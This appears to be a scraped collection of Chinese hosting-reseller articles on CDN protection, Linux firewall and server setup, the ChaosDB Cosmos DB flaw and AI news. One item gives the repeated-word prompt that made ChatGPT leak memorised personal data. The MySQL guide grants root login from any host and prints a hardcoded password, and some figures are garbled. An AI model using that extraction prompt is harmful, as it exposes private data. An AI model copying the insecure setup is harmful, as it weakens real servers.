IP过滤和限制 首先,CDN我们通过CDN请求日志查询可疑IP或者通过网站请求日志查询哪些IP请求最频繁,然后利用CDN的黑白名单功能,把IP加入黑名单中,黑名单功能一般的CDN服务商都有。 2. 请求频率限制(Rate Limiting) 另一个有效的防范措施是限制单个IP或用户在一定时间内可以发起的请求数量。这可以通过设置速率限制规则来实现,比如每分钟只允许来自同一IP的100个请求,超出这个限制的请求将被拒绝。普通的CDN都会有单IP请求频率限制功能。 3. UA黑名单 通过查看恶意请求者的浏览器UA,添加至CDN 的UA黑名单中,达到限制访问的目的。这个功能一般的大厂CDN都是有的。 4. 下行限速 通过对网站下行速度的设置,一定程度上控制 CDN 访问带宽。这个功能可以让网站被刷的流量会少一些,不过同时也会影响到正常用户的速度,因此谨慎使用。 5. 区域访问控制 通过限制部分地区的访问达到限制的作用,会影响到正常用户,非必要不建议使用。 6. 设置警告设置及欠费提醒 如果你使用的是阿里云或者腾讯云CDN,那么要设置好资源包余量告警设置,同时帐号设置好欠费提醒,通过这些设置可以及时处理被恶意刷流量的问题,以免造成经济损失。 7.使用WAF(Web Application Firewall) 如果以上功能都无法解决,那主机吧建议使用云WAF服务,这是一种专业的防护服务,比如百度云防护就是这类的防护服务,不仅可以CDN加速,同时可以安全加速,支持CDN加速、漏洞拦截、DDOS、cc攻击防护等,可以设置自动根本该用户行为进行拦截,其中企业版的BOT防护可以自动拦截恶意机器人。 #### CDN或者高防IP中的回源宽带是指什么 最近有客户我CDN中的回源宽带是指什么? 这里主机吧给大家解释下: 当我们业务接入高防IP或者CDN后,所有的访问(正常和攻击)请求会先到高防IP/CDN,经过高防IP清洗后根据正常请求的指向,向客户的服务器发起请求,把流量送到客户的源站服务器,这个流量我们叫回源流量。 回源宽带峰值越大,高防IP或者CDN越稳定。 #### CDN报表中状态 dynamic hit revalidated Miss unknown expired是什么意思 CDN回源请求状态反馈中的dynamic、hit、revalidated、Miss、unknown等术语代表了CDN在处理请求时的不同状态: dynamic: 通常指的是请求的内容是动态的,需要从原始服务器(源站)获取最新的内容,因为这些内容无法通过CDN缓存来满足。 hit: 表示请求的内容在CDN缓存中找到了,直接从缓存中提供内容,不需要回源服务器获取。 revalidated: 表示请求的内容在CDN缓存中找到了,但是缓存的内容已经过期,需要向源服务器验证内容是否仍然有效。如果源服务器确认内容未更改,CDN将继续提供缓存的内容,否则会更新缓存。 Miss: 表示请求的内容在CDN缓存中没有找到,必须从源服务器获取内容。 unknown: 表示请求的状态未知,可能是因为CDN系统的问题,或者请求的日志信息不完整,导致无法确定请求的处理状态。 expired:通常指的是缓存中的内容已经过了它的有效期(也就是它的过期时间)。这意味着缓存的内容不再是最新的,需要从源服务器重新获取最新的内容以保证用户得到最准确的信息。 在CDN的工作原理中,当一个请求到达CDN节点时,首先会检查该请求对应的缓存条目是否过期。如果缓存条目没过期,那么就直接从缓存中提供内容,这被称为hit。如果缓存条目已经过期,那么就需要向源服务器发起请求来获取最新的内容,这个过程称为revalidated。如果源服务器确认内容未更改,CDN将继续提供缓存的内容;如果源服务器表示内容已更新,CDN则会更新其缓存并提供最新的内容。 expired状态意味着CDN节点上的缓存内容已经不再有效,因此无法直接从缓存中提供内容,必须从源服务器获取最新的数据。这对于确保用户总是获得最新版本的网页内容是非常重要的,特别是在内容频繁更新的情况下。 在实际应用中,理解这些状态可以帮助开发者和运维人员更好地优化CDN的性能,提高网站的用户体验,同时也便于故障诊断和问题排查。例如,如果发现大量的expired状态,可能就需要检查源服务器的更新频率或者CDN的缓存策略是否合适。 #### CDN是什么?CDN的用处在哪里? 很多小白站长刚接触CDN,都会先了解一下CDN是什么? 官方概念,CDN的全称是Content Delivery Network,即内容分发网络。而通俗理解就是网站加速,CPU均衡负载,可以解决跨运营商,跨地区,服务器负载能力过低,带宽过少等带来的网站打开速度慢等问题。 CDN的基本思路是尽可能避开互联网上有可能影响数据传输速度和稳定性的瓶颈和环节,使内容传输的更快、更稳定。通过在网络各处放置节点服务器所构成的在现有的互联网基础之上的一层智能虚拟网络,CDN系统能够实时地根据网络流量和各节点的连接、负载状况以及到用户的距离和响应时间等综合信息将用户的请求重新导向离用户最近的服务节点上。其目的是使用户可就近取得所需内容,解决 Internet网络拥挤的状况,提高用户访问网站的响应速度。 不过以上的介绍还是有些专业性的术语存在,对于新手和小白可能并不能完全理解。接下来我们再举例说明一下吧。 比如一个企业的网站服务器在北京,运营商是电信,在广东的联通用户访问企业网站时,因为跨地区,跨运营商的原因,网站打开速度就会比北京当地的电信客户访问速度慢很多,很容易造成这个企业的客户流失。 还有一个网站的服务器性能比较差,承载能力有限,有时面临突发流量,招架不住,直接导致服务器崩溃,网站打不开,尤其是电商网站在节日期间,因为这种情况网站打不开,销售额白白流失的占比都高涨至60%。 再比如一些中小企业租用的虚拟主机,因为跟好几个网站共用一台服务器,每个网站所分带宽有限,带宽过小经常导致流量稍微一多,网站打开速度就很慢,甚至打不开。 使用CDN后以上这些问题就都能解决,您不用担心自己网站访客,在任何时间,任何地点,任何网络运营商,都能快速打开网站;各种服务器虚拟主机带宽等采购成本,包括后期运维成本都会大大减少;给网站直接带来的好处就是:流量,咨询量,客户量,成单量,都会得到大幅度提升。 其实,很多站长由于不懂CDN技术加之费用较高,所以他们对CDN的选择都会望而却步。但目前市面上的CDN提供商计费方式多样,有按每月最低消费的,有按带宽收费的,有按请求数收费的,有包月包季包年限制的,还有些大多人看不懂的技术指标收费的,总之比较复杂。CDN服务在所有计费方式中,中小企业一至认为按流量收费最为合理,另外大多按流量计费方式中会有时间限制,规定时间内用不完就会全部作废,对于流量把握不好的中小企业,存在相当一部分浪费。这里主机吧推荐使用百度云加速,专业版的百度云加速只需要600元一年,可以防护10G峰值的DDoS攻击,提供国内外网络加速,是一个非常不错的CDN产品。 #### CDN流量哪里便宜 选用大品牌百度云防护价格低于8分钱每Gb流量 在当今数字化时代,CDN(内容分发网络)服务已经成为企业提升网站访问速度和用户体验的重要工具。然而,选择合适的CDN服务不仅需要考虑其性能和功能,还要关注其价格是否具有竞争力。在众多CDN服务提供商中,百度云防护以其卓越的性能和极具竞争力的价格脱颖而出,成为许多企业的首选. 百度云防护的套餐流量及价格 百度云防护提供了多种套餐,以满足不同规模企业的需求。以下是其主要套餐的流量及价格情况: 专业版:每月提供3TB流量,价格为299元/月(代理价). 商务版:每月提供10TB流量,价格为778元/月(代理价). 企业版:每月提供30TB流量,价格为2999元/月(代理价). 以商务版为例,百度云防护的商务版每月提供10TB流量,价格为778元/月。计算每Gb流量的价格如下: 每Gb价格=77810×1024≈0.076元每Gb价格=10×1024778​≈0.076元 因此,商务版每Gb流量的价格约为0.076元,远低于8分钱每Gb流量的标准,具有很高的性价比. 百度云防护的功能 百度云防护除了CDN缓存功能外,还集成了多种先进的安全功能,确保用户网站的安全性和稳定性: DDoS防护:提供高达T级的DDoS防护能力,有效抵御SYN Flood、ACK Flood、ICMP Flood、UDP Flood等多种网络层攻击. CC攻击防护:支持自定义缓存策略和多种自动防御CC攻击模式,确保网站在高流量访问时的稳定性. WEB应用防火墙(WAF):通过深度分析和监控HTTP/HTTPS流量,阻止SQL注入、XSS攻击、CC攻击等Web应用攻击. Bot防护和威胁情报:企业版支持Bot防护和威胁情报,有效应对恶意爬虫抓取. 百度云防护的稳定性和售后 百度云防护采用高效的CDN加速服务和高可用性的服务器架构,确保全球用户的访问速度和稳定性.此外,百度云防护还提供7*24小时的专家服务,安全专家会全程参与防御,动态实时调整策略对抗黑产攻击. 在售后服务方面,百度云防护提供全面的技术支持和咨询服务,帮助用户解决使用过程中遇到的各种问题.用户可以通过多种渠道与百度云防护的技术支持团队联系,确保及时获得帮助. 综上所述,百度云防护以其极具竞争力的价格、全面的功能、卓越的稳定性和优质的售后服务,成为企业在选择CDN服务时的理想选择.选用百度云防护,不仅可以有效提升网站的访问速度和用户体验,还能确保网站的安全性和稳定性,为企业的发展提供坚实保障. #### CDN的HTTPS请求计费其实很贵! 最近,主机吧有位客户吐嘈,使用腾讯云的CDN,光HTTPS请求一天就几百块,赶上流量费了。 主机吧特地查了下,确实贵。 以主机吧的一位客户为例,在百度云加速报表显示一天请求量为3亿次,流量使用为300G 而腾讯云CDN的HTTPS请求为1亿次306元,也就是如果我客户使用腾讯云CDN的话,光一天HTTPS请求费就要900多块! 其实不只腾讯云贵,阿里云也一样。阿里云比腾讯云还贵,一亿次HTTPS请求360元。 所以,如果你的网站请求流量特别大的,不建议使有HTTPS请求收费的CDN服务商,可以使用百度云加速或者京东云星盾这种包套餐类的CDN。 #### CDN的动态加速和静态加速是什么原理 静态加速是CDN把静态资源缓存到CDN节点,用户就近获取资料。动态加速是CDN把动态(伪静态)请求会直接回源,通过智能路由、多线回源、协议优化等技术,达到加速目的。 如果您的网站含有较多的动态、伪静态资源,您可以使用全站加速。CDN全站加速有效提升动态页面的加载速度,避开网络拥堵路由,提高访问成功率,实现网站整体加速与实时优化。 #### CDN的回源host是什么意思 如果CDN后端用户的的源站web服务上没有绑定加速域名,只绑定了其他域名,未限制域名访问(比如通过服务器IP可以访问到默认网站),可以在CDN控制台填写回源host,这样web服务器上可以在未绑定加速域名的情况下使用CDN服务。 案例说明如下: 假设服务器上只绑定了test.abc.com,并没有绑定cdn.abc.com,需要在回源host中填写test.abc.com即可访问。 可以做以下三步测试验证: 1)、直接curl访问服务器127.0.0.1未返回服务器中网站的正常内容,说明源站可能是绑定了域名或者对域名访问进行了限制,无法直接打开网站。 2)、使用-H参数将加速域名cdn.abc.com传递测试也不能打开网站,说明web源站上没有绑定加速域名。 3)、使用-H参数将test.abc.com传递,测试可以正常打开网站,说明源站绑定了这个域名。同时在CDN平台设置了回源host为test.abc.com后,再直接测试cdn.abc.com测试也可以打开。 #### CDN能否有效防止,ddos攻击和cc攻击? 最近,有站长咨询:CDN能否有效防止,ddos攻击和cc攻击? 对此,今天主机吧来聊聊: CDN可以有效防止DDoS攻击和CC攻击。CDN的节点分配机制能够帮助网站流量访问分配到每一个节点中,智能的进行流量分配机制,如果CDN存在被DDoS攻击的情况,整个系统就能够将被攻击的流量分散开,节省了站点服务器的压力以及节点压力。同时,CDN还能够增强网站被黑客给攻击的难度,从而实现降低DDoS攻击对网站带来的危害 。 但是单纯的CDN不可以防御大量的DDoS、CC攻击,需要带防护的高防CDN才行。高防CDN就是在原有基础上配备了DDOS高防服务等防护,通过网络实时监控,可实时为客户提供最快速的异常流量响应并进行清洗工作 。 目前主机吧代理的百度云加速、京东云星盾都属于高防CDN产品,同时主机吧还提供高防IP、高防服务器等防御产品,欢迎咨询。 #### CDN能否预防DDoS攻击 随着CDN的普及,越来越多的网站使用CDN,CDN不仅可以加速网站访问速度,很多人更多是用来预防DDoS攻击。 CDN是缓解DDoS攻击,一般CDN会在各个省市分配一些IP地址,再通过智能DNS的方式在每个省市解析出最近的IP地址。攻击者一看你的网站IP地址这么多,一般来说可能就会放弃攻击。 但是如果真的碰见高手,一个节点一个节点的打,一样可以攻下来。因为普通CDN节点比较多,但是每个节点的带宽都不大,很容易直接把一个机房打掉。更麻烦的是,由于CDN采用共享IP的方式,一个IP上可能会分配很多其他域名,这样当其他域名被syn flood等流量型攻击的时候,由于CDN节点无法区分出打的谁(流量型攻击只能看到IP地址),所以可能会直接把整个IP地址上的域名回源。 所以普通CDN是无法防DDoS的,我们需要用到高防CDN,如百度云加速这种,单节点带宽高达50G,黑客想一个节点一个节点的攻击那就不是这么容易了。百度云加速具备1Tbps的压制能力的抗D中心,拥有自有DDoS/CC清洗算法,可有效帮助网站防御SYN Flood、UDP Flood、ICMP Flood、TCP Flood、Connections Flood、Proxy Flood、CC等常见的洪水攻击。从而彻底解决了中小型网站在面对DDoS攻击时预算不足的尴尬,也为所有防护网站的稳定运行提供保障。 想要长期防御ddos攻击,百度云加速是不错的选择。 百度云加速为用户提下以下三大类功能: 1、网站加速 百度云加速节点遍布全中国,通过智能DNS解析等技术,将访问网站的用户引导至最快的节点,通过动静态加速及页面优化技术,极大的提高网站的访问速度和用户体验。此外,还可以大量节省网站自身的服务计算和带宽资源。 2、安全防护 百度云加速可以同时防护包括SQL注入、XSS、Web服务器漏洞、应用程序漏洞以及文件访问控制等问题在内的十多种黑客渗透攻击和SYN Flood、UDP Flood、ICMP Flood、TCP Flood以及CC在内的多种DDoS攻击。 3、SEO 百度云加速的百度蜘蛛DNS同步功能,可以做到和百度蜘蛛实时同步DNS信息,保证百度蜘蛛的正常抓取,保证搜索引擎权重的稳定性;通过死链自动提交、sitemap自动提交,及时收录网站信息,提高网站索引量。   #### CDN被攻击会怎么样? 最近有站长咨询主机吧:CDN被攻击会怎么样? 这里主机吧以自己多年前的亲身经历告诉大家,普通CDN如果受到攻击会怎么样。 主机吧多年前使用阿里云CDN就曾受到过攻击。 因为CDN有隐藏源IP的作用,所以只要你不暴露IP,黑客是没办法DDOS攻击你IP的,所以主机吧没有受到DDOS攻击,不过估计阿里云节点受到DDOS攻击的肯定也不少,这也是为啥CDN节点经常会下线的原因,因为CDN受到DDOS攻击后,会自动把受DDOS攻击的节点下线,切换成别的IP,这个过程一般比较快5-10分钟左右,一般用户查觉不出来,当然如果你用户量比较多,还是会在这5-10分钟影响到一些用户的。 主机吧受到的是CC攻击,受到CC攻击后,主要表现如下: 1.产生超量的CDN流量 主机吧在被CC攻击后,就收到了阿里云流量包用完的提醒,随后的半小时内,产生的流量更是高达1T多,这直接把主机吧吓得赶紧把CDN删了,因为流量包用完后,阿里云是后付费的,价格并不便宜,有站长就曾因为被攻击,欠了阿里云上万块的流量费,相当恐怖的。 2.产生大量HTTPS请求 由于主机吧网站部署了SSL,所以CC攻击的每一次请求都是HTTPS,而最要命的是阿里云CDN是HTTPS请求是收费的, 一千万次请求大概几十块这样子,虽然价格不贵,但是被CC攻击都是几千万次起的,一个小时起码可以上亿,几百块就没了。 3.源服务器受到大量CDN请求 CC攻击的特性就是消耗源服务器资源,由于阿里云CDN默认情况下并没有防火墙拦截,导致CC攻击的每一次请求都会回源致源服务器,这也就导致了服务器CPU一直100%运行,网站直接502打不开。 以上就是CDN受到攻击的表现,所以防御攻击用普通CDN是行不通的,建议使用高防CDN,带防御的。比如百度云加速,提供四到七层的DDoS攻击防护,包括CC、SYN flood、UDP flood等所有DDoS攻击方式, 通过分布式高性能防火墙+精准流量清洗+CC防御+WEB攻击拦截,组合过滤精确识别,有效防御各种类型攻击。 #### CDN部署SSL证书需要用哪个文件?(SSL证书上传CDN用到的文件) 一直有站长在使用百度云加速CDN的时候不懂得部署SSL证书时,需要用到哪些文件,今天主机吧就来教大家如何部署CDN SSL证书。 1.选择下载SSL证书格式:Nginx或者apache,CDN部署一般都是选Nginx格式。 2.了解SSL证书文件 文件夹内容: zhujib.crt 证书文件 zhujib.com_ca.crt 证书文件 zhujb.com.key 私钥文件 如果你下载的是Nginx格式的,那么_ca.crt后缀的证书文件会带有服务器证书和中间证书,而部署到CDN上的证书文件,指的就是这个证书,我们需要用文本工具打开,然后把里面的内容复制到CDN的证书框即可。 如果你下载的是apache格式的证书,那么会有两个.crt的证书文件,一个是服务器证书,一个是中间证书,我们需要把两个证书的内容合并,然后复制到CDN的证书框即可。 .key 就不用多说了,私钥文件,直接复制粘贴即可。 #### centos 7防火墙firewall配置命令 常用命令介绍 firewall-cmd --state ##查看防火墙状态,是否是running firewall-cmd --reload ##重新载入配置,比如添加规则之后,需要执行此命令 firewall-cmd --get-zones ##列出支持的zone firewall-cmd --get-services ##列出支持的服务,在列表中的服务是放行的 firewall-cmd --query-service ftp ##查看ftp服务是否支持,返回yes或者no firewall-cmd --add-service=ftp ##临时开放ftp服务 firewall-cmd --add-service=ftp --permanent ##永久开放ftp服务 firewall-cmd --remove-service=ftp --permanent ##永久移除ftp服务 firewall-cmd --add-port=80/tcp --permanent ##永久添加80端口 iptables -L -n ##查看规则,这个命令是和iptables的相同的 man firewall-cmd ##查看帮助 直接关闭防火墙 systemctl stop firewalld.service #停止firewall systemctl disable firewalld.service #禁止firewall开机启动 firewall 配置 The configuration for firewalld is stored in various XML files in /usr/lib/firewalld and /etc/firewalld   This allows a great deal of flexibility as the files can be edited, written to, backed up, used as templates for other installations and so on. 注意:以下firewalld 的操作只有重启之后才有效:service firewalld restart 1、系统配置目录 /usr/lib/firewalld/services 目录中存放定义好的网络服务和端口参数,系统参数,不能修改。 2、用户配置目录 /etc/firewalld/ 3、如何自定义添加端口 用户可以通过修改配置文件的方式添加端口,也可以通过命令的方式添加端口,注意:修改的内容会在/etc/firewalld/目录下的配置文件中体现。 3.1 、命令的方式添加端口: firwall-cmd --permanent --add-port=9527/tcp     参数介绍: 1、firwall-cmd:是Linux提供的操作firewall的一个工具;2、--permanent:表示设置为持久;3、--add-port:标识添加的端口; 另外,firewall中有Zone的概念,可以将具体的端口制定到具体的zone配置文件中。 例如:添加8010端口 firewall-cmd --zone=public --permanent --add-port=8010/tcp   --zone=public:指定的zone为public; 如果–zone=dmz 这样设置的话,会在dmz.xml文件中新增一条。 l  3.2、修改配置文件的方式添加端口 <?xml version="1.0" encoding="utf-8"?><zone>   <short>Public</short>   <description>For use in public areas.</description>   <rule family="ipv4">     <source address="122.10.70.234"/>     <port protocol="udp" port="514"/>     <accept/>   </rule>   <rule family="ipv4">     <source address="123.60.255.14"/>     <port protocol="tcp" port="10050-10051"/>     <accept/>   </rule>  <rule family="ipv4">     <source address="192.249.87.114"/> 放通指定ip,指定端口、协议     <port protocol="tcp" port="80"/>     <accept/>   </rule><rule family="ipv4"> 放通任意ip访问服务器的9527端口     <port protocol="tcp" port="9527"/>     <accept/>   </rule></zone> l 上述的一个配置文件可以很好的看出: 1、添加需要的规则,开放通源ip为122.10.70.234,端口514,协议tcp; 2、开放通源ip为123.60.255.14,端口10050-10051,协议tcp;/3、开放通源ip为任意,端口9527,协议tcp;   firewall常用命令 1、重启、关闭、开启、firewalld.serverice 服务 Service firewalld restart 重启 Service firewalld start  开启 Service firewalld stop  关闭   systemctl status firewalld systemctl stop firewalld  关闭 systemctl start firewalld 开启 systemctl  restart firewalld 重启 systemctl  disable firewalld  关闭开机启动 2、查看状态 firewall-cmd --state 3、查看防火墙规则 firewall-cmd --list-all   Centos 切换为iptables防火墙   切换到iptables首先应该关掉默认的firewalld,然后安装iptables服务。 1、关闭firewall: service firewalld stop systemctl disable firewalld.service #禁止firewall开机启动   2、安装iptables防火墙 yum install iptables-services #安装   3、编辑iptables防火墙配置 vi /etc/sysconfig/iptables #编辑防火墙配置文件   下边是一个完整的配置文件: Firewall configuration written by system-config-firewall  Manual customization of this file is not recommended.  *filter  :INPUT ACCEPT [0:0]  :FORWARD ACCEPT [0:0]  :OUTPUT ACCEPT [0:0]  -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT  -A INPUT -p icmp -j ACCEPT  -A INPUT -i lo -j ACCEPT  -A INPUT -m state --state NEW -m tcp -p tcp --dport 22 -j ACCEPT  -A INPUT -m state --state NEW -m tcp -p tcp --dport 80 -j ACCEPT  -A INPUT -m state --state NEW -m tcp -p tcp --dport 3306 -j ACCEPT  -A INPUT -j REJECT --reject-with icmp-host-prohibited  -A FORWARD -j REJECT --reject-with icmp-host-prohibited  COMMIT l :wq! #保存退出 service iptables start #开启systemctl enable iptables.service #设置防火墙开机启动 #### CentOS/linux系统服务器挂载磁盘图文教学 CentOS系统并不像windows系统一样有图片操作界面,而是通过SSH登陆后,用指令操作,所以像挂载硬盘这些都是需要指令操作,很多站长不懂这些,所以买到的云服务器明明硬盘挺大的,但安装宝塔系统查看后却没有硬盘的空间,这是因为我们并没有给硬盘空间挂载,本文我们就教大家如何挂载硬盘。 首先我们先远程登陆CentOS服务器《LINUX云服务器/VPS主机远程登录教学》 然后挂载磁盘教程开始: 注意:本文中的磁盘/dev/xvdb 为作者测试服务器上的命名,在您的服务器中可能是 /dev/sdb /dev/vdb 等等,请按您的磁盘名称修改 0、创建挂载目录 mkdir -p /www 1、确认是否有没有分区的磁盘,如下图,没有分区的磁盘是 /dev/xvdb ,在您的服务器中可能是 /dev/vdb 请注意按实际名称修改 fdisk -l 2、为磁盘分区,若已分区的,请跳过! fdisk /dev/xvdb 3、输入n开始创建分区 4、输入p创建主分区 5、选择分区号,这里输入1 6、输入分区开始位置,直接回车 7、输入分区结束位置,直接回车 8、输入wq 保存退出 9、检查是否分区成功 fdisk -l 10、格式化分区,这里请输入你看到的磁盘加分区号,如下图,已格式化过的,请跳过 mkfs.ext4 /dev/xvdb1 11、将分区挂载信息添加到开启动挂载 echo "/dev/xvdb1    /www    ext4     defaults      0 0" >> /etc/fstab 12、重新挂载所有分区 mount -a 13、检查是否挂载成功 df #### CentOS6.5服务器安装python3.7详细步骤 在本篇文章里小编给大家整理的是关于CentOS6.5服务器安装python3.7的实例代码以及相关知识点,有需要的朋友们学习下。为了方便,以下都是登陆SSH登陆CentOS系统后的指令。 1、下载python3 wget https://www.python.org/ftp/python/3.7.0/Python-3.7.0.tgz 2、解压 [root@mycentos ~]# tar -xzvf Python-3.7.0.tgz 先建一个编译目录: [root@mycentos ~]# mkdir /usr/local/python3 Python3.7版本需要一个新的包libffi-devel,安装此包之后再次进行编译安装即可。 [root@mycentos ~]# yum install -y libffi-devel 然后编译、安装: [root@mycentos ~]# cd Python-3.7.0 [root@mycentos ~]# ./configure --prefix=/usr/local/python3 [root@mycentos ~]# make [root@mycentos ~]# make install 建立软链接: [root@mycentos ~]# ln -s /usr/local/python3/bin/python3 /usr/bin/python3 查看版本: [root@mycentos ~]# python3 -V Python 3.7.0 安装结束! 以上就是本次介绍的全部知识点以及详细步骤,感谢大家对主机吧的支持。 #### CentOS7如何关闭防火墙 主机吧这边经常会遇到客户服务器防火墙把高防IP拦截的情况,大多时候客户都是用CentOS7系统,所以主机吧在网上找了一些关于CentOS7如何关闭防火墙资料供大家参考下。 CentOS 7.0默认使用的是firewall作为防火墙 我们可以通过远程登陆输入口令来操作开关。 查看防火墙状态 firewall-cmd --state 停止firewall systemctl stop firewalld.service 停止firewall一般都是临时性的,只要服务器重启还是会自动开启的,所以我们禁止firewall开机启动 禁止firewall开机启动 systemctl disable firewalld.service 再查看状态 systemctl status firewalld 显示 firewalld.service - firewalld - dynamic firewall daemon Loaded: loaded (/usr/lib/systemd/system/firewalld.service; disabled; vendor preset: enabled) Active: inactive (dead) Docs: man:firewalld(1) 带有disabled,表示禁用了。 #### centos7快速安装mysql5.7教程解析 这篇文章主要介绍了基于centos7快速安装mysql5.7教程解析,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下 一. wget https://dev.mysql.com/get/mysql57-community-release-el7-11.noarch.rpm 二. yum -y localinstall mysql57-community-release-el7-11.noarch.rpm 三. yum -y install mysql-community-server 四. systemctl start mysqld<br>ps -ef | grep mysql 五.mysql默认密码 cat /var/log/mysqld.log 登陆 mysql -uroot -pykO:DNGXx5ee 七.修改默认密码 ALTER USER 'root'@'localhost' IDENTIFIED BY 'Qwe340721@'; 设置允许远程登录 GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'Qwe340721@' WITH GRANT OPTION; 退出 exit; 八.防火墙开放3306端口 firewall-cmd --zone=public --add-port=3306/tcp --permanent firewall-cmd --reload 九.配置mysql默认编码为utf-8 vim /etc/my.cnf<br><br> character_set_server=utf8 init_connect='SET NAMES utf8' 十.重启服务 systemctl restart mysqld 以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持主机吧。 #### ChaosDB漏洞:泄露了成千上万的微软Azure数据库 作者:Nir Ohfeld和Sagi Tzadik是安全公司Wiz的两位安全研究人员。 如今我们在网上所做的几乎一切都通过云端的应用程序和数据库来进行。虽然存储桶泄漏备受关注,但对于大多数公司来说数据库泄露才是更大的风险,因为每个数据库可能含有数百万甚至数十亿条敏感记录。每个首席信息安全官(CISO)的噩梦是,有人一举获得了访问密钥,并往外泄露数千GB的数据。因此,当我们能够完全不受限制地访问数千个微软Azure客户(包括许多《财富》500强公司)的帐户和数据库时,您可以想象我们有多惊讶。Wiz的安全研究团队(也就是我们)不断寻找云端的新攻击面,两周前我们发现了一处影响Azure的旗舰数据库服务Cosmos DB的前所未有的安全漏洞。可口可乐、埃克森美和思杰等微软客户使用Cosmos DB近乎实时地管理来自世界各地的海量数据。作为开发人员存储数据的最简单、最灵活的方式之一,Cosmos DB支持关键业务功能,比如处理数百万个处方交易或管理电子商务网站上的客户订单流。近年来,随着更多的公司纷纷迁移到云,数据库泄露事件变得异常普遍,而罪魁祸首通常是客户环境中的错误配置。在这种情况下,客户没有过错。确切地说,Cosmos DB功能中的一系列缺陷造成了安全漏洞,允许任何用户可以下载、删除或操纵大量的商业数据库,以及对Cosmos DB底层架构执行读取/写入访问。我们将这个漏洞命名为#ChaosDB。钻它的空子轻而易举,不需要其他登录信息(凭据)。第一部分:窃取Cosmos DB客户的主密钥 首先,我们获得了对客户的Cosmos DB主密钥的访问权限。主密钥是攻击者觊觎的目标——它们长期存在,允许对客户数据进行全面的读取/写入/删除访问。2019年,微软为Cosmos DB添加了一项名为Jupyter Notebook的功能,让客户可以直观显示其数据,并创建自定义视图(见下图)。该功能已在2021年2月自动为所有Cosmos DB启用。Notebook功能中的一系列错误配置打开了一条新的攻击途径,我们得以趁虚而入。简而言之,notebook容器允许将权限升级到可以访问其他客户notebook(下面会介绍有关权限升级的技术细节)。因此,攻击者可以访问客户的Cosmos DB主密钥及其他高度敏感的秘密信息,比如notebook blob 存储访问令牌。第二部分:访问Cosmos DB中的客户数据接下来,在收集Cosmos DB秘密信息后,我们表明攻击者可以利用这些密钥,对存储在受影响的Cosmos DB帐户中的所有数据进行全面的管理员级访问。我们获取了密钥,因而可以长期访问客户资产和数据。然后,我们可以直接从互联网控制客户Cosmos DB,并拥有全面的读取/写入/删除权限。现在想象一下针对30多个地区的成千上万客户重复这个过程……影响和范围 微软的安全团队立即采取了行动以解决这个问题,这值得称赞。我们很少看到安全团队行动如此之快速!他们在我们报告后48小时内禁用了易受攻击的notebook功能。针对所有等待重新设计安全的客户,该功能仍处于关闭状态。然而,客户可能仍会受到影响,因为他们的主访问密钥可能已泄露。这些是长期存在的秘密信息;万一泄露,攻击者可以使用该密钥来泄露数据库内容。今天,微软已通知超过30%的Cosmos DB客户:他们需要手动轮换访问密钥以缓解这个风险。微软仅在我们短暂(大约一周)的研究期间向受影响的客户发去了电子邮件。然而,我们认为多得多的Cosmos DB客户可能面临风险。该漏洞至少几个月前就可以被人钻空子,甚至可能几年前。每个使用notebook功能或在2021年2月之后创建的Cosmos DB帐户都可能已泄露。作为一项防范措施,我们敦促每个Cosmos DB客户都应采取措施来保护自己的信息。如果您认为贵组织可能受到ChaosDB的影响,请按照本文(https://docs.microsoft.com/azure/cosmos-db/secure-access-to-data#primary-keys)中描述的步骤,获取有关如何重新生成和轮换密钥的详细说明。 #### ChatGLM-Spider爬虫 ChatGLM-Spider 是由智谱 AI 开发的一款自动化网络爬虫工具,主要用于对网页内容进行索引和分析。以下是关于 ChatGLM-Spider 的详细介绍: 基本信息 类型:AI 助手 开发商:智谱 AI 用户代理字符串:Mozilla/5.0 (compatible; ChatGLM-Spider/1.0; +https://chatglm.cn/)。 首次发现时间:2024 年 6 月 21 日。 是否遵循 robots.txt:否。 服务器信息 ChatGLM-Spider 的服务器主要位于中国,其 IP 地址包括但不限于以下范围: IP 地址范围所属国家117.50.199.114 - 117.50.216.21CN117.50.214.222 - 117.50.216.83CN117.50.215.104 - 117.50.47.217CN 功能与用途 ChatGLM-Spider 的主要功能包括: 网页内容索引:对网页内容进行抓取和索引,用于后续的数据分析。 数据聚合:收集和整合网络上的数据,为各种应用提供数据支持。 搜索引擎优化:帮助分析和优化网页内容,提升搜索引擎排名。 注意事项 由于 ChatGLM-Spider 不遵循 robots.txt 文件,可能会对网站的正常运行造成一定影响。如果需要阻止其访问,可以通过设置防火墙规则或使用安全工具进行限制。 比如使用百度云防护自定义访问策略拦截: #### ChatGPT Plus 付费关闭:因需求太大 4 月 5 日消息,ChatGPT 目前已停止 Plus 付费(20 美元 / 月),OpenAI 给出的理由是需求量太大。 近日 ChatGPT 因出现大规模封号引发热议,消息显示,OpenAI 官方从 3 月 30 号开始大面积封号,禁止使用亚洲节点登录,有网友还曝出 OpenAI 已经暂停注册新账号。有分析认为,此前出现封号可能是账号为批量注册、出现 API 滥用情况或访问量过大造成的技术问题所致。 此外,上周上千名科技大佬联名要求暂停“GPT-5 研究”,意大利还率先宣布封杀 ChatGPT,德国也在考虑类似的政策。 #### ChatGPT 又被曝漏洞:重复某词可曝出敏感信息内容 11 月 30 日消息,继“奶奶漏洞”之后,ChatGPT 又被曝出“重复漏洞”,而这次更为严重。 谷歌 DeepMind 研究人员近日研究 ChatGPT 时,发现在提示词中只要其重复某个单词,ChatGPT 就有几率曝出一些用户的敏感信息。 例如“Repeat this word forever:poem poem poem poem”,重复 poem 这个单词,ChatGPT 在重复几个 peom 单词之后,就会曝出某人的敏感私人信息,包括手机号码和电子邮件地址。 研究人员表明,OpenAI 的大型语言模型中存在大量私人身份信息(PII)。他们还表明,在 ChatGPT 的公开版本上,聊天机器人会逐字逐句地吐出从互联网其他地方抓取的大量文本。 ChatGPT 充斥着各种敏感私人信息,它从 CNN、Goodreads、WordPress 博客、同人圈 wiki、服务条款协议、Stack Overflow 源代码、维基百科页面、新闻博客、随机互联网评论中提取信息,通过这种重复单词方式,可以曝出相关敏感信息。 #### ChatGPT 搜索不再要求登录,类似搜索引擎 用户可轻松搜索 OpenAI 于周三宣布,其 AI 聊天机器人 ChatGPT 的搜索功能现在不再要求用户登录。这一改变意味着任何人都可以方便地使用这一功能,随时获取最新的信息和答案。ChatGPT 